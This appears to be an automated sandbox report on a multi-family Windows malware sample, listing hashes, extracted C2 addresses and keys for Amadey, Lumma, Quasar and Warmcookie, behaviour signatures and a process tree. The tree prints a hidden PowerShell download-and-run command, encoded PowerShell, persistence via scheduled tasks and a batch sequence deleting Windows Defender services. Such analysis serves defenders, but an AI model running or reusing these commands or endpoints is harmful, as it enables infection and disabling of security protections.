Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/04/2025, 17:55

General

  • Target

    2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    56e63ce4c31d134e740e27050eaf59b7

  • SHA1

    ba2531ce8f5995788d1aee232455dd91bb9e57a0

  • SHA256

    9e0e8cca2556ab0d517e41ab0fb799e94b25deecac731753daeccd091e402948

  • SHA512

    fc6d9ee8f1b69acb810494de3a49dd43328bb494b12e787021b413680e928d246d5b143c8eb76622e200ce09d3dbf28f18a1705b2a005e207a2f08c68af729e8

  • SSDEEP

    24576:DqDEvCTbMWu7rQYlBQcBiT6rprG8a0Au:DTvC/MTQYxsWR7a0A

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://navstarx.shop/FoaJSi

https://dmetalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://-targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://targett.top/dsANGt

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

Extracted

Family

amadey

Version

5.33

Botnet

faec90

Attributes
  • install_dir

    52907c9546

  • install_file

    tgvazx.exe

  • strings_key

    cc9d94f7503394295f4824f8cfd50608

  • url_paths

    /Di0Her478/index.php

rc4.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

CyberPunk

C2

dakar.wohowoho.com:443

dakar.wohowoho.com:80

206.206.76.75:443

206.206.76.75:80

62.60.226.176:80

62.60.226.176:443

Mutex

5e809a5b-bb22-41b6-af20-5285e99040d3

Attributes
  • encryption_key

    A98DEEE2D49BDF1C5183B3079E9B28E281586F6F

  • install_name

    chrome.exe

  • log_directory

    Logs

  • reconnect_delay

    30000

  • startup_key

    GoogleChrome

  • subdirectory

    Google\Chrome

Extracted

Family

warmcookie

C2

192.36.57.50

Attributes
  • mutex

    62580f79-f0e4-46c9-9fe6-041328dce2b7

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Warmcookie family
  • Warmcookie, Badspace

    Warmcookie aka Badspace is a backdoor written in C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 16 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 45 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 58 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 37 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 63 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:3004
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:4416
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:3636
    • C:\Users\Admin\AppData\Local\Temp\2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn WIjBTma5e3B /tr "mshta C:\Users\Admin\AppData\Local\Temp\p6jdEd9yb.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4352
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn WIjBTma5e3B /tr "mshta C:\Users\Admin\AppData\Local\Temp\p6jdEd9yb.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4120
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\p6jdEd9yb.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4636
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:228
          • C:\Users\Admin\AppData\Local\Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE
            "C:\Users\Admin\AppData\Local\Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3728
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:752
              • C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe
                "C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3672
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4792
              • C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe
                "C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3652
                • C:\Users\Admin\Abspawnhlp.exe
                  "C:\Users\Admin\Abspawnhlp.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:3684
                  • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                    C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of WriteProcessMemory
                    PID:3892
                    • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                      C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                      9⤵
                      • Downloads MZ/PE file
                      • Checks computer location settings
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Modifies registry class
                      PID:2060
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet
                        10⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2756
                      • C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"
                        10⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:4528
                        • C:\Users\Admin\Abspawnhlp.exe
                          "C:\Users\Admin\Abspawnhlp.exe"
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:3436
                          • C:\Users\Admin\Abspawnhlp.exe
                            C:\Users\Admin\Abspawnhlp.exe
                            12⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:3508
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\SysWOW64\cmd.exe
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:3484
                      • C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"
                        10⤵
                        • Executes dropped EXE
                        • Drops file in Windows directory
                        PID:396
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi" /quiet
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:976
                      • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                        "C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:1648
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 80
                          11⤵
                          • Program crash
                          PID:1444
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:1352
                      • C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"
                        10⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:552
                      • C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"
                        10⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1580
                        • C:\Users\Admin\CamMenuMaker.exe
                          "C:\Users\Admin\CamMenuMaker.exe"
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:4292
                          • C:\Users\Admin\CamMenuMaker.exe
                            C:\Users\Admin\CamMenuMaker.exe
                            12⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: AddClipboardFormatListener
                            PID:6844
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==
                              13⤵
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              PID:5996
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\SysWOW64\cmd.exe
                            12⤵
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:316
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\SysWOW64\cmd.exe
                      9⤵
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2752
              • C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe
                "C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1444
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                    PID:3236
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1528
                • C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe
                  "C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1212
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3236
                  • C:\ProgramData\Google\Chrome\chrome.exe
                    "C:\ProgramData\Google\Chrome\chrome.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:2776
                    • C:\Windows\SYSTEM32\schtasks.exe
                      "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
                      8⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:1580
                • C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe
                  "C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:6168
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                      PID:6648
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:1084
                  • C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe
                    "C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:1444
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:6188
                  • C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe
                    "C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:5304
                    • C:\Users\Admin\AppData\Local\Temp\261.exe
                      "C:\Users\Admin\AppData\Local\Temp\261.exe"
                      7⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:6792
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\599F.tmp\59A0.tmp\59A1.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                        8⤵
                          PID:404
                          • C:\Users\Admin\AppData\Local\Temp\261.exe
                            "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                            9⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:6756
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5A99.tmp\5A9A.tmp\5A9B.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                              10⤵
                              • Drops file in Program Files directory
                              PID:2304
                              • C:\Windows\system32\sc.exe
                                sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                11⤵
                                • Launches sc.exe
                                PID:3156
                              • C:\Windows\system32\sc.exe
                                sc start ddrver
                                11⤵
                                • Launches sc.exe
                                PID:6076
                              • C:\Windows\system32\timeout.exe
                                timeout /t 1
                                11⤵
                                • Delays execution with timeout.exe
                                PID:5316
                              • C:\Windows\system32\sc.exe
                                sc stop ddrver
                                11⤵
                                • Launches sc.exe
                                PID:7000
                              • C:\Windows\system32\sc.exe
                                sc start ddrver
                                11⤵
                                • Launches sc.exe
                                PID:5576
                              • C:\Windows\system32\takeown.exe
                                takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                11⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:5924
                              • C:\Windows\system32\icacls.exe
                                icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                11⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:2084
                              • C:\Windows\system32\sc.exe
                                sc stop "WinDefend"
                                11⤵
                                • Launches sc.exe
                                PID:5988
                              • C:\Windows\system32\sc.exe
                                sc delete "WinDefend"
                                11⤵
                                • Launches sc.exe
                                PID:5292
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                11⤵
                                  PID:2840
                                • C:\Windows\system32\sc.exe
                                  sc stop "MDCoreSvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:5512
                                • C:\Windows\system32\sc.exe
                                  sc delete "MDCoreSvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:4760
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                  11⤵
                                    PID:3444
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdNisSvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:6160
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdNisSvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:6228
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                    11⤵
                                      PID:6460
                                    • C:\Windows\system32\sc.exe
                                      sc stop "Sense"
                                      11⤵
                                      • Launches sc.exe
                                      PID:6624
                                    • C:\Windows\system32\sc.exe
                                      sc delete "Sense"
                                      11⤵
                                      • Launches sc.exe
                                      PID:6652
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                      11⤵
                                        PID:5288
                                      • C:\Windows\system32\sc.exe
                                        sc stop "wscsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:5564
                                      • C:\Windows\system32\sc.exe
                                        sc delete "wscsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:6976
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                        11⤵
                                        • Modifies security service
                                        PID:5804
                                      • C:\Windows\system32\sc.exe
                                        sc stop "SgrmBroker"
                                        11⤵
                                        • Launches sc.exe
                                        PID:6480
                                      • C:\Windows\system32\sc.exe
                                        sc delete "SgrmBroker"
                                        11⤵
                                        • Launches sc.exe
                                        PID:6568
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                        11⤵
                                          PID:3084
                                        • C:\Windows\system32\sc.exe
                                          sc stop "SecurityHealthService"
                                          11⤵
                                          • Launches sc.exe
                                          PID:212
                                        • C:\Windows\system32\sc.exe
                                          sc delete "SecurityHealthService"
                                          11⤵
                                          • Launches sc.exe
                                          PID:1716
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                          11⤵
                                            PID:6184
                                          • C:\Windows\system32\sc.exe
                                            sc stop "webthreatdefsvc"
                                            11⤵
                                            • Launches sc.exe
                                            PID:5596
                                          • C:\Windows\system32\sc.exe
                                            sc delete "webthreatdefsvc"
                                            11⤵
                                            • Launches sc.exe
                                            PID:5720
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                            11⤵
                                              PID:6964
                                            • C:\Windows\system32\sc.exe
                                              sc stop "webthreatdefusersvc"
                                              11⤵
                                              • Launches sc.exe
                                              PID:6320
                                            • C:\Windows\system32\sc.exe
                                              sc delete "webthreatdefusersvc"
                                              11⤵
                                              • Launches sc.exe
                                              PID:1944
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                              11⤵
                                                PID:7064
                                              • C:\Windows\system32\sc.exe
                                                sc stop "WdNisDrv"
                                                11⤵
                                                • Launches sc.exe
                                                PID:5712
                                              • C:\Windows\system32\sc.exe
                                                sc delete "WdNisDrv"
                                                11⤵
                                                • Launches sc.exe
                                                PID:3964
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                11⤵
                                                  PID:6660
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2968
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:7072
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                  11⤵
                                                    PID:5684
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "WdFilter"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:4664
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "WdFilter"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:4968
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                    11⤵
                                                      PID:6508
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "SgrmAgent"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:6676
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "SgrmAgent"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:6760
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                      11⤵
                                                        PID:6860
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "MsSecWfp"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:5320
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "MsSecWfp"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:5312
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                        11⤵
                                                          PID:5984
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop "MsSecFlt"
                                                          11⤵
                                                          • Launches sc.exe
                                                          PID:6292
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete "MsSecFlt"
                                                          11⤵
                                                          • Launches sc.exe
                                                          PID:6696
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                          11⤵
                                                            PID:6800
                                                          • C:\Windows\system32\sc.exe
                                                            sc stop "MsSecCore"
                                                            11⤵
                                                            • Launches sc.exe
                                                            PID:7076
                                                          • C:\Windows\system32\sc.exe
                                                            sc delete "MsSecCore"
                                                            11⤵
                                                            • Launches sc.exe
                                                            PID:5812
